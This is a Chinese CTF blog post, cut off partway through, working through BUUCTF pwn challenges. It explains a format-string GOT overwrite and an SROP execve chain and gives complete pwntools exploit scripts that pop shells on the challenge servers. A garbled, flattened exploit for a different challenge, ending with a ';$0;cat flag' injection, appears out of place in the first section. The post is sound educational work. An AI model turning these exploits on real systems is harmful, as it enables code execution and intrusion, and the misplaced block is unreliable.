<!DOCTYPE html>
<html lang="zh-Hans">

<head>
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="x5-fullscreen" content="true">
<meta name="full-screen" content="yes">
<meta name="theme-color" content="#317EFB" />
<meta content="width=device-width, initial-scale=1.0, maximum-scale=5.0, user-scalable=0" name="viewport">
<meta name="description" content="buu刷题路之前在buu上也遇到很多有意思的题，但是当时太懒，也就没有记录，可能是自己没有学习的劲头吧，现在想要好好学习，所以开始记录一些自己觉得有价值的题，多学一点儿，后面打ctf 的时候更加轻松一点儿，不至于每次打比赛看到题都是两眼一抹黑。 Pwntools的context设置与shellcode_pwntools context-CSDN博客 这篇文章是pwntools的context的环境">
<meta property="og:type" content="article">
<meta property="og:title" content="buu刷题路">
<meta property="og:url" content="https://www.imalun.com/2025/07/14/buu%E5%88%B7%E9%A2%98%E8%B7%AF/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="buu刷题路之前在buu上也遇到很多有意思的题，但是当时太懒，也就没有记录，可能是自己没有学习的劲头吧，现在想要好好学习，所以开始记录一些自己觉得有价值的题，多学一点儿，后面打ctf 的时候更加轻松一点儿，不至于每次打比赛看到题都是两眼一抹黑。 Pwntools的context设置与shellcode_pwntools context-CSDN博客 这篇文章是pwntools的context的环境">
<meta property="og:locale">
<meta property="og:image" content="https://www.imalun.com/img/404.jpg">
<meta property="og:image" content="https://www.imalun.com/img/404.jpg">
<meta property="og:image" content="https://www.imalun.com/img/404.jpg">
<meta property="og:image" content="https://www.imalun.com/img/404.jpg">
<meta property="og:image" content="https://www.imalun.com/img/404.jpg">
<meta property="og:image" content="https://www.imalun.com/img/404.jpg">
<meta property="og:image" content="https://www.imalun.com/img/404.jpg">
<meta property="og:image" content="https://www.imalun.com/img/404.jpg">
<meta property="og:image" content="https://www.imalun.com/img/404.jpg">
<meta property="og:image" content="https://www.imalun.com/img/404.jpg">
<meta property="og:image" content="https://www.imalun.com/img/404.jpg">
<meta property="og:image" content="https://www.imalun.com/img/404.jpg">
<meta property="og:image" content="https://www.imalun.com/img/404.jpg">
<meta property="og:image" content="https://www.imalun.com/img/404.jpg">
<meta property="og:image" content="https://www.imalun.com/img/404.jpg">
<meta property="og:image" content="https://www.imalun.com/img/404.jpg">
<meta property="og:image" content="https://www.imalun.com/img/404.jpg">
<meta property="og:image" content="https://www.imalun.com/img/404.jpg">
<meta property="og:image" content="https://www.imalun.com/img/404.jpg">
<meta property="og:image" content="https://www.imalun.com/img/404.jpg">
<meta property="og:image" content="https://www.imalun.com/img/404.jpg">
<meta property="og:image" content="https://www.imalun.com/img/404.jpg">
<meta property="og:image" content="https://www.imalun.com/img/404.jpg">
<meta property="og:image" content="https://www.imalun.com/img/404.jpg">
<meta property="og:image" content="https://www.imalun.com/img/404.jpg">
<meta property="og:image" content="https://www.imalun.com/img/404.jpg">
<meta property="article:published_time" content="2025-07-14T03:13:30.000Z">
<meta property="article:modified_time" content="2025-07-17T08:18:51.723Z">
<meta property="article:author" content="enp0">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://www.imalun.com/img/404.jpg">


<title >buu刷题路</title>

<!-- Favicon -->

    <link href='/favicon-16x16.png?v=2.2.6' rel='icon' type='image/png' sizes='16x16' ></link>


    <link href='/favicon-32x32.png?v=2.2.6' rel='icon' type='image/png' sizes='32x32' ></link>


    <link href='/apple-touch-icon.png?v=2.2.6' rel='apple-touch-icon' sizes='180x180' ></link>


    <link href='/site.webmanifest' rel='manifest' ></link>


<!-- Plugin -->




    
<link rel="stylesheet" href="/css/plugins/bootstrap.row.css">

    
<link rel="stylesheet" href="https://npm.elemecdn.com/@fancyapps/ui@4.0/dist/fancybox.css">

    
    




<!-- Icon -->

    
<link rel="stylesheet" href="/css/plugins/font-awesome.min.css">




<!-- Variable -->
<script>window.ASYNC_CONFIG = {"hostname":"www.imalun.com","author":"enp0","root":"/","typed_text":["沉浸在二进制海洋里的二进制狗"],"theme_version":"2.2.6","theme":{"switch":true,"default":"style-light"},"favicon":{"logo":"log.png","icon16":"favicon-16x16.png","icon32":"favicon-32x32.png","apple_touch_icon":"apple-touch-icon.png","webmanifest":"/site.webmanifest","visibilitychange":true,"hidden":"failure.ico","show_text":"欢迎各位✌莅临指导","hide_text":"(●—●)喔哟，崩溃啦！"},"i18n":{"placeholder":"搜索文章...","empty":"找不到您查询的内容: ${query}","hits":"找到 ${hits} 条结果","hits_time":"找到 ${hits} 条结果（用时 ${time} 毫秒）","author":"本文作者：","copyright_link":"本文链接：","copyright_license_title":"版权声明：","copyright_license_content":"本博客所有文章除特别声明外，均默认采用 undefined 许可协议。","copy_success":"复制成功","copy_failure":"复制失败","open_read_mode":"进入阅读模式","exit_read_mode":"退出阅读模式","notice_outdate_message":"距离上次更新已经 undefined 天了, 文章内容可能已经过时。","sticky":"置顶","just":"刚刚","min":"分钟前","hour":"小时前","day":"天前","month":"个月前"},"swup":false,"plugin":{"flickr_justified_gallery":"https://npm.elemecdn.com/flickr-justified-gallery@latest/dist/fjGallery.min.js"},"icons":{"sun":"far fa-sun","moon":"far fa-moon","play":"fas fa-play","email":"far fa-envelope","next":"fas fa-arrow-right","calendar":"far fa-calendar-alt","clock":"far fa-clock","user":"far fa-user","back_top":"fas fa-arrow-up","close":"fas fa-times","search":"fas fa-search","reward":"fas fa-hand-holding-usd","toc_tag":"fas fa-th-list","read":"fas fa-book-reader","arrows":"fas fa-arrows-alt-h","double_arrows":"fas fa-angle-double-down","copy":"fas fa-copy","user_tag":"fas fa-user-alt"},"icontype":"font","highlight":{"plugin":"highlighjs","theme":true,"copy":true,"lang":false,"title":"default","height_limit":200},"toc":{"post_title":false},"live_time":{"start_time":"07/10/2025 17:00:00","prefix":"博客已萌萌哒运行 undefined 天"},"danmu":{"enable":false,"el":".trm-banner"},"covers":["/%E3%80%90%E5%93%B2%E9%A3%8E%E5%A3%81%E7%BA%B8%E3%80%91%E4%B8%AD%E4%B8%96%E7%BA%AA-%E5%AD%A4%E7%8B%AC%E7%9A%84%E5%A5%B3%E5%AD%A9.png","/%E3%80%90%E5%93%B2%E9%A3%8E%E5%A3%81%E7%BA%B8%E3%80%91%E5%A2%A8%E4%BE%A0%E5%AE%A2%E8%A1%8C-%E6%8F%92%E7%94%BB.png","/%E3%80%90%E5%93%B2%E9%A3%8E%E5%A3%81%E7%BA%B8%E3%80%91%E5%8D%A1%E6%AF%94-%E6%95%B0%E5%AD%97%E8%89%BA%E6%9C%AF-%E6%B0%B4.png","/%E3%80%90%E5%93%B2%E9%A3%8E%E5%A3%81%E7%BA%B8%E3%80%91%E4%B8%A4%E7%A7%8D%E8%89%B2%E8%B0%83%E7%9A%84%E5%A4%B4%E5%8F%91-%E5%8A%A8%E6%BC%AB%E5%A5%B3%E5%AD%A9.pmg","/%E3%80%90%E5%93%B2%E9%A3%8E%E5%A3%81%E7%BA%B8%E3%80%91Chris%E6%8F%92%E7%94%BB-%E6%8F%92%E7%94%BB.png","/%E3%80%90%E5%93%B2%E9%A3%8E%E5%A3%81%E7%BA%B8%E3%80%91WLOP-%E7%89%B9%E5%86%99.png","/%E3%80%90%E5%93%B2%E9%A3%8E%E5%A3%81%E7%BA%B8%E3%80%91%E5%B8%BD%E5%AD%90-%E6%89%8B%E5%A5%97-%E7%94%B5%E5%BD%B1%E4%BA%BA%E7%89%A9.png"]};</script>
<script id="async-page-config">window.PAGE_CONFIG = {"isPost":true,"isHome":false,"postUpdate":"2025-07-17 16:18:51"};</script>

<!-- Theme mode css -->
<link data-swup-theme rel="stylesheet" href="/css/index.css?v=2.2.6" id="trm-switch-style">
<script>
    let defaultMode = ASYNC_CONFIG.theme.default !=='auto' ?  ASYNC_CONFIG.theme.default : (window.matchMedia("(prefers-color-scheme: light)").matches ? 'style-light' : 'style-dark')
    let catchMode = localStorage.getItem('theme-mode') || defaultMode;
    let type = catchMode === 'style-dark' ? 'add' : 'remove';
    document.documentElement.classList[type]('dark')
</script>

<!-- CDN -->


    
    



<!-- Site Analytics -->


     

    

    
 
<meta name="generator" content="Hexo 7.3.0"></head>

<body>

  <!-- app wrapper -->
  <div class="trm-app-frame">

    <!-- page preloader -->
    <div class="trm-preloader">
    <div class="trm-holder">
        <div class="preloader">
            <div></div>
            <div></div>
            <div></div>
            <div></div>
            <div></div>
            <div></div>
            <div></div>
            <div></div>
            <div></div>
            <div></div>
        </div>
    </div>
</div>
    <!-- page preloader end -->

    <!-- change mode preloader -->
    <div class="trm-mode-swich-animation-frame">
    <div class="trm-mode-swich-animation">
        <i class="i-sun"><i class="iconfont far fa-sun"></i></i>
        <div class="trm-horizon"></div>
        <i class="i-moon"><i class="iconfont far fa-moon"></i></i>
    </div>
</div>
    <!-- change mode preloader end -->

      <!-- scroll container -->
      <div id="trm-dynamic-content" class="trm-swup-animation">
        <div id="trm-scroll-container" class="trm-scroll-container" style="opacity: 0">
            <!-- top bar -->
            <header class="trm-top-bar">
	<div class="container">
		<div class="trm-left-side">
			<!-- logo -->
<a href="/" class="trm-logo-frame trm-anima-link">
    
        <img alt="logo" src="/log.png">
    
    
        <div class="trm-logo-text">
            enp0的个人博客<span></span>
        </div>
    
</a>
<!-- logo end -->
		</div>
		<div class="trm-right-side">
			<!-- menu -->
<div class="trm-menu">
    <nav>
        <ul>
            
            <li class="menu-item-has-children ">
                <a  href="/" target="">
                    首页
                </a>
                
                <ul>
                    
                    <li>
                        <a  href="/archives2/" target="">
                            archives2
                        </a>
                    </li>
                    
                </ul>
                
            </li>
            
            <li class="menu-item-has-children ">
                <a  href="/archives/" target="">
                    归档
                </a>
                
            </li>
            
            <li class="menu-item-has-children ">
                <a  href="/categories/" target="">
                    分类
                </a>
                
            </li>
            
            <li class="menu-item-has-children ">
                <a  href="/links/" target="">
                    友链
                </a>
                
            </li>
            
        </ul>
    </nav>
</div>
<!-- menu end -->
			
    <!-- mode switcher place -->
    <div class="trm-mode-switcher-place">
        <div class="trm-mode-switcher">
            <i class="iconfont far fa-sun"></i>
            <input class="tgl tgl-light" id="trm-swich" type="checkbox">
            <label class="trm-swich" for="trm-swich"></label>
            <i class="iconfont far fa-moon"></i>
        </div>
    </div>
    <!-- mode switcher place end -->

			
		</div>
		<div class="trm-menu-btn">
			<span></span>
		</div>
	</div>
</header>
            <!-- top bar end -->

            <!-- body -->
            
<div class="trm-content-start">
    <!-- banner -->
    <div class="trm-banner">
    
    <!-- banner cover -->
    <img style="object-position:top;object-fit:cover;" alt="banner" class="trm-banner-cover" src="/%E3%80%90%E5%93%B2%E9%A3%8E%E5%A3%81%E7%BA%B8%E3%80%91%E4%B8%A4%E7%A7%8D%E8%89%B2%E8%B0%83%E7%9A%84%E5%A4%B4%E5%8F%91-%E5%8A%A8%E6%BC%AB%E5%A5%B3%E5%AD%A9.png">
    <!-- banner cover end -->
    

    <!-- banner content -->
    <div class="trm-banner-content trm-overlay">
        <div class="container">
            <div class="row">
                
                <div class="col-lg-4"></div>
                
                <div class="col-lg-8">

                    <!-- banner title -->
                    <div class="trm-banner-text ">
                        <div class="trm-label trm-mb-20">
                            NEWS LETTER
                        </div>
                        <h1 class="trm-mb-30 trm-hsmb-font">
                            buu刷题路
                        </h1>

                        
                            <ul class="trm-breadcrumbs trm-label">
                                <li>
                                    <a href="/" class="trm-anima-link">Home</a>
                                </li>
                                <li>
                                    <span>
                                        2025
                                    </span>
                                </li>
                            </ul>
                        
                    </div>
                    <!-- banner title end -->

                    <!-- scroll hint -->
                    <span id="scroll-triger" class="trm-scroll-hint-frame">
                        <div class="trm-scroll-hint"></div>
                        <span class="trm-label">Scroll down</span>
                    </span>
                    <!-- scroll hint end -->

                </div>
            </div>
        </div>
    </div>
    <!-- banner content end -->
</div>
    <!-- banner end -->
    <div class="container">
        <div class="row">
            
                <div class="trm-page-sidebar col-lg-4 hidden-sm">
                    <!-- main card -->
                    <div class="trm-main-card-frame trm-sidebar">
    <div class="trm-main-card"> 
        <!-- card header -->
<div class="trm-mc-header">
    <div class="trm-avatar-frame trm-mb-20">
        <img alt="Avatar" class="trm-avatar" src="/touxiang.png">
    </div>
    <h5 class="trm-name trm-mb-15">
        enp0
    </h5>
    
        <div class="trm-label">
            一个
            <span class="trm-typed-text">
                <!-- Words for theme.user.typedText -->
            </span>
        </div>
    
</div>
<!-- card header end -->
        <!-- sidebar social -->

<div class="trm-divider trm-mb-40 trm-mt-40"></div>
<div class="trm-social">
    
        <a href="https://github.com" title="github" rel="nofollow" target="_blank">
            <i class="iconfont fab fa-github"></i>
        </a>
    
        <a href="https://accessible.com" title="gitee" rel="nofollow" target="_blank">
            <i class="iconfont fab fa-accessible-icon"></i>
        </a>
    
        <a href="https://earlybirds.com" title="gitee" rel="nofollow" target="_blank">
            <i class="iconfont fab fa-earlybirds"></i>
        </a>
    
        <a href="https://github.com" title="gitee" rel="nofollow" target="_blank">
            <i class="iconfont far fa-grin-tongue-squint"></i>
        </a>
    
</div>

<!-- sidebar social end -->
        <!-- info -->
<div class="trm-divider trm-mb-40 trm-mt-40"></div>
<ul class="trm-table trm-mb-20">
    
        <li>
            <div class="trm-label">
                地址:
            </div>
            <div class="trm-label trm-label-light">
                火星
            </div>
        </li>
    
        <li>
            <div class="trm-label">
                年龄:
            </div>
            <div class="trm-label trm-label-light">
                18
            </div>
        </li>
    
</ul>
<!-- info end -->

        
    <div class="trm-divider trm-mb-40 trm-mt-40"></div>
    <!-- action button -->
    <div class="text-center">
        <a href="mailto:2209645844@qq.com" class="trm-btn">
            联系我
            <i class="iconfont far fa-envelope"></i>
        </a>
    </div>
    <!-- action button end -->

    </div>
</div>
                    <!-- main card end -->
                </div>
            
            <div class="trm-page-content col-lg-8">
                <div id="trm-content" class="trm-content">
                    <div class="trm-post-info row hidden-sm">
    <div class="col-sm-4">
        <div class="trm-card trm-label trm-label-light text-center">
            <i class="iconfont far fa-calendar-alt trm-icon"></i><br>
            07/17
        </div>
    </div>
    <div class="col-sm-4">
        <div class="trm-card trm-label trm-label-light text-center">
            <i class="iconfont far fa-clock trm-icon"></i><br>
            16:18
        </div>
    </div>
    <div class="col-sm-4">
        <div id="post-author" class="trm-card trm-label trm-label-light text-center">
            <i class="iconfont far fa-user trm-icon"></i><br>
            enp0
        </div>
    </div>
</div>
<div class="trm-card ">
    <article id="article-container" class="trm-publication">
    <h1 id="buu刷题路"><a href="#buu刷题路" class="headerlink" title="buu刷题路"></a>buu刷题路</h1><p>之前在buu上也遇到很多有意思的题，但是当时太懒，也就没有记录，可能是自己没有学习的劲头吧，现在想要好好学习，所以开始记录一些自己觉得有价值的题，多学一点儿，后面打ctf 的时候更加轻松一点儿，不至于每次打比赛看到题都是两眼一抹黑。</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_45556441/article/details/114166906?fromshare=blogdetail&sharetype=blogdetail&sharerId=114166906&sharerefer=PC&sharesource=2401_86608136&sharefrom=from_link">Pwntools的context设置与shellcode_pwntools context-CSDN博客</a></p>
<p>这篇文章是pwntools的context的环境设置。</p>
<h2 id="1-inndy-echo-1"><a href="#1-inndy-echo-1" class="headerlink" title="1.inndy_echo 1"></a>1.inndy_echo 1</h2><p>最近一直在写一些有关pwntools工具利用的问题，感觉记不住，就记录下来方便以后查看。</p>
<p><strong>前置知识</strong>：在 <code>pwntools</code> 中，<code>fmtstr_payload()</code> 是一个用于 <strong>自动化构造格式化字符串漏洞（Format String Exploit）</strong> 的 payload 的函数。它的作用是 <strong>利用 <code>printf</code>、<code>sprintf</code> 等格式化字符串函数的漏洞，向内存中写入任意数据</strong>（例如修改 GOT 表劫持程序执行流）。</p>
<p><strong>函数原型</strong></p>
<p>python</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">fmtstr_payload(offset, writes, numbwritten=0, write_size=&#x27;byte&#x27;)</span><br></pre></td></tr></table></figure>

<ul>
<li><strong><code>offset</code></strong>：格式化字符串的偏移位置（即 <code>%n$p</code> 中的 <code>n</code>）。</li>
<li><strong><code>writes</code></strong>：一个字典 <code>&#123;addr: value&#125;</code>，表示要往哪些地址写入哪些数据。</li>
<li><strong><code>numbwritten</code></strong>（可选）：已经输出的字符数（默认 0）。</li>
<li><strong><code>write_size</code></strong>（可选）：写入大小，可以是 <code>&#39;byte&#39;</code>、<code>&#39;short&#39;</code>、<code>&#39;int&#39;</code>（默认 <code>&#39;byte&#39;</code>）。</li>
</ul>
<p>但是在pwntools库中函数模型如下所示，</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">fmtstr_payload(argue_place, &#123;printf_got_addr: system_plt_addr&#125;)</span><br></pre></td></tr></table></figure>

<p><strong>参数解析</strong></p>
<ol>
<li><strong><code>argue_place</code></strong><ul>
<li>表示格式化字符串的偏移量，即在栈上 <code>printf</code> 的第几个参数是可控的。</li>
<li>例如，如果输入 <code>&quot;AAAA%6$p&quot;</code> 时输出 <code>AAAA0x41414141</code>，说明偏移量是 <code>6</code>。</li>
</ul>
</li>
<li><strong><code>&#123;printf_got_addr: system_plt_addr&#125;</code></strong><ul>
<li>表示要修改 <code>printf</code> 的 GOT 表项（<code>printf_got_addr</code>），使其指向 <code>system</code> 的 PLT 地址（<code>system_plt_addr</code>）。</li>
<li>这样，当程序调用 <code>printf</code> 时，实际执行的是 <code>system</code>，从而可能实现任意命令执行（如 <code>system(&quot;/bin/sh&quot;)</code>）。</li>
</ul>
</li>
</ol>
<p><strong>题目解析</strong></p>
<p>1.例行检查，32位程序，开启了nx保护<br><img src="/../images/47fa09af55dd13a31e6a817e314e551f.png" alt="在这里插入图片描述"  data-tag='post-image' onload='this.onload=null;this.style.opacity=1;' loading="lazy" onerror='this.onerror=null;this.src="/img/404.jpg"'></p>
<p>xxxxxxxxxx from pwn import *context.arch&#x3D;’amd64’p&#x3D;remote(‘node5.buuoj.cn’,26619)#p&#x3D;process(‘.&#x2F;axb_2019_fmt64’)elf &#x3D; ELF(“.&#x2F;axb_2019_fmt64”)libc&#x3D;ELF(‘&#x2F;home&#x2F;gwht&#x2F;Downloads&#x2F;libc6_2.23-0ubuntu11_amd64.so’)#libc&#x3D;ELF(‘&#x2F;lib&#x2F;x86_64-linux-gnu&#x2F;libc.so.6’)payload&#x3D;b’ZXD%11$s^%12$s^%13$s—-‘+p64(elf.got[‘memset’])+p64(elf.got[‘read’])+p64(elf.got[‘sprintf’])#gdb.attach(p)#pause()p.send(payload)p.recvuntil(‘ZXD’)memset&#x3D;u64(p.recvn(6).ljust(8,b’\x00’))p.recvn(1)read&#x3D;u64(p.recvn(6).ljust(8,b’\x00’))p.recvn(1)sprintf&#x3D;u64(p.recvn(6).ljust(8,b’\x00’))log.success(hex(memset))log.success(hex(read))log.success(hex(sprintf))libc_addr&#x3D;sprintf-libc.sym[‘sprintf’]log.success(hex(libc_addr))system&#x3D;libc_addr+libc.sym[‘system’]log.success(hex(system))payload&#x3D;fmtstr_payload(8,{elf.got[‘strlen’]:libc_addr+libc.sym[‘system’]},numbwritten&#x3D;9)#payload&#x3D;’1145141919810’#gdb.attach(p)#pause()p.send(payload)payload&#x3D;’;$0;cat flag’p.send(payload)​p.interactive()python</p>
<p><img src="/../images/image-20250714111542897.png" alt="image-20250714111542897"  data-tag='post-image' onload='this.onload=null;this.style.opacity=1;' loading="lazy" onerror='this.onerror=null;this.src="/img/404.jpg"'></p>
<p>3.32ida检查</p>
<p><img src="/../images/image-20250714111552474.png" alt="image-20250714111552474"  data-tag='post-image' onload='this.onload=null;this.style.opacity=1;' loading="lazy" onerror='this.onerror=null;this.src="/img/404.jpg"'></p>
<p>也能看出有格式化字符串漏洞，并且能一直运用；</p>
<p>看到程序里存在格式化字符串漏洞，而且有system函数，想到的是将printf@got修改为system@plt，由于一开始system没用执行，所以got表里的地址不对，得用plt表里的。然后传入bin&#x2F;sh即可</p>
<p>pwntools集成了一个很强的工具，我们可以通过它快速修改对应的值，<br>命令格式： <strong>fmtstr_payload(argue_place, {printf_got_addr: system_plt_addr})</strong><br>其中argue_place代表payload中前四个字符所在的参数位置（就是说%p$n中p的值,我们长叫它偏移量）</p>
<p>5.编写exp并打通靶机</p>
<p><img src="/../images/image-20250714111606255.png" alt="image-20250714111606255"  data-tag='post-image' onload='this.onload=null;this.style.opacity=1;' loading="lazy" onerror='this.onerror=null;this.src="/img/404.jpg"'></p>
<p>完整exp：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">p=remote(&quot;node5.buuoj.cn&quot;,28857)</span><br><span class="line"></span><br><span class="line">elf=ELF(&quot;./echo&quot;)</span><br><span class="line">system_plt=elf.plt[&#x27;system&#x27;]</span><br><span class="line"></span><br><span class="line">printf_got=elf.got[&#x27;printf&#x27;]</span><br><span class="line"></span><br><span class="line">payload=fmtstr_payload(7,&#123;printf_got:system_plt&#125;)</span><br><span class="line"></span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line">p.sendline(&quot;bin/sh\x00&quot;)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="2-rootersctf-2019-srop"><a href="#2-rootersctf-2019-srop" class="headerlink" title="2.rootersctf_2019_srop"></a>2.rootersctf_2019_srop</h2><p>借鉴文章</p>
<p><a target="_blank" rel="noopener" href="http://liul14n.top/2020/03/11/%E9%80%9A%E8%BF%87%E4%B8%89%E9%81%93%E9%A2%98%E7%9B%AE%E5%AD%A6%E4%B9%A0SROP%E6%8A%80%E6%9C%AF/">通过三道题目学习SROP技术 | LiuLian</a></p>
<p>1.首先还是checksec一下，看一下这道题的保护机制，可以看到这道题只开启了nx保护。</p>
<p><img src="/../images/image-20250714111617270.png" alt="image-20250714111617270"  data-tag='post-image' onload='this.onload=null;this.style.opacity=1;' loading="lazy" onerror='this.onerror=null;this.src="/img/404.jpg"'></p>
<p>2.上述可以看到这是一道64位的程序，拖入ida中（如下图所示），我们可以看到程序很简单，两步写入和读入</p>
<p><img src="/../images/image-20250714111625228.png" alt="image-20250714111625228"  data-tag='post-image' onload='this.onload=null;this.style.opacity=1;' loading="lazy" onerror='this.onerror=null;this.src="/img/404.jpg"'></p>
<p><img src="/../images/image-20250714111633820.png" alt="image-20250714111633820"  data-tag='post-image' onload='this.onload=null;this.style.opacity=1;' loading="lazy" onerror='this.onerror=null;this.src="/img/404.jpg"'></p>
<p>上述的前提是</p>
<p><strong>可以通过栈溢出控制栈上的内容。</strong></p>
<p><strong>需要知道栈地址，从而知道如传入的“&#x2F;bin&#x2F;sh”字符串的地址。</strong></p>
<p><strong>需要知道syscall的地址。</strong></p>
<p><strong>需要知道sigreturn的内存地址。</strong></p>
<p>这道题读入0x400字节，足够构造多个sig片段，下图ida中可以看到syscall的地址</p>
<p><img src="/../images/image-20250714111649520.png" alt="image-20250714111649520"  data-tag='post-image' onload='this.onload=null;this.style.opacity=1;' loading="lazy" onerror='this.onerror=null;this.src="/img/404.jpg"'></p>
<p>由于没有bin&#x2F;sh&#x2F;字符串，但是有一个可读可写的data片段，</p>
<p><img src="/../images/image-20250714111701030.png" alt="image-20250714111701030"  data-tag='post-image' onload='this.onload=null;this.style.opacity=1;' loading="lazy" onerror='this.onerror=null;this.src="/img/404.jpg"'></p>
<p>然后通过SROP执行一次read系统调用（主要目的是为了写入&#x2F;bin&#x2F;sh）</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#read(0,addr,0x400)</span></span><br><span class="line">frame = SigreturnFrame(kernel=<span class="string">&quot;amd64&quot;</span>)</span><br><span class="line">frame.rax = constants.SYS_read <span class="comment"># read </span></span><br><span class="line">frame.rdi = <span class="number">0</span> <span class="comment"># stdin</span></span><br><span class="line">frame.rsi = data_addr</span><br><span class="line">frame.rdx = <span class="number">0x400</span></span><br><span class="line">frame.rip = syscall_leave_ret</span><br><span class="line">frame.rbp = data_addr </span><br><span class="line"></span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">0x80</span> + <span class="string">&#x27;b&#x27;</span>*<span class="number">8</span></span><br><span class="line">payload += p64(pop_rax_syscall_leave_ret)</span><br><span class="line">payload += p64(<span class="number">15</span>) + <span class="built_in">str</span>(frame)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">c.send(payload)</span><br></pre></td></tr></table></figure>

<p>然后向addr写入<code>/bin/sh</code>并再次进行sigreturn系统调用，执行<code>execve(&#39;/bin/sh&#39;,0,0)</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">frame = SigreturnFrame()</span><br><span class="line">frame.rax = constants.SYS_execve</span><br><span class="line">frame.rdi = addr</span><br><span class="line">frame.rsi = <span class="number">0</span></span><br><span class="line">frame.rdx = <span class="number">0</span></span><br><span class="line">frame.rip = syscall_leave_ret</span><br><span class="line"></span><br><span class="line">payload = <span class="string">&#x27;/bin/sh\x00&#x27;</span> + p64(pop_rax_syscall_leave_ret)</span><br><span class="line">payload += p64(<span class="number">15</span>) + <span class="built_in">str</span>(frame)</span><br><span class="line"></span><br><span class="line">c.send(payload)</span><br><span class="line"></span><br><span class="line">c.interactive()</span><br></pre></td></tr></table></figure>

<p>注意第一次构造frame的时候，我们设置了frame.rsp &#x3D; addr，frame.rbp &#x3D; addr，这是因为由于我们的gadgets是<code>syscall;leave;ret</code>，中间有个<code>leave</code>，<code>leave</code>就相当于<code>mov rsp,rbp;pop rbp</code>，为了构造SROP链，我们需要让rsp指向我们下一个payload的地址，但如果我们的rbp为0的话，<code>leave</code>以后rsp也为0，这显然不符合我们的要求，所以这个需要<code>让rbp=addr</code>。</p>
<p>但由于<code>leave</code>还有一个<code>pop rbp</code>的功能，这里构造就较为巧妙，我们addr的位置前8字节正好被写为<code>/bin/sh\x00</code>，这样当我们ret的时候，正好能将<code>p64(pop_rax_syscall_leave_ret)</code>传给rip来执行，然后进行下一次sigreturn系统调用。</p>
<p>exp如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context(arch=<span class="string">&#x27;amd64&#x27;</span>, os=<span class="string">&#x27;linux&#x27;</span>, log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># p = process(&#x27;./srop&#x27;)</span></span><br><span class="line"></span><br><span class="line">p=remote(<span class="string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="number">28017</span>)</span><br><span class="line"></span><br><span class="line">pop_rax_syscall_leave_ret = <span class="number">0x401032</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">.text:0000000000401032                 pop     rax</span></span><br><span class="line"><span class="string">.text:0000000000401033                 syscall</span></span><br><span class="line"><span class="string">.text:0000000000401035                 leave</span></span><br><span class="line"><span class="string">.text:0000000000401036                 retn</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line">syscall_leave_ret = <span class="number">0x401033</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">.text:0000000000401033                 syscall</span></span><br><span class="line"><span class="string">.text:0000000000401035                 leave</span></span><br><span class="line"><span class="string">.text:0000000000401036                 retn</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line">syscall_addr = <span class="number">0x401046</span></span><br><span class="line">data_addr = <span class="number">0x402000</span></span><br><span class="line"></span><br><span class="line">frame = SigreturnFrame(kernel=<span 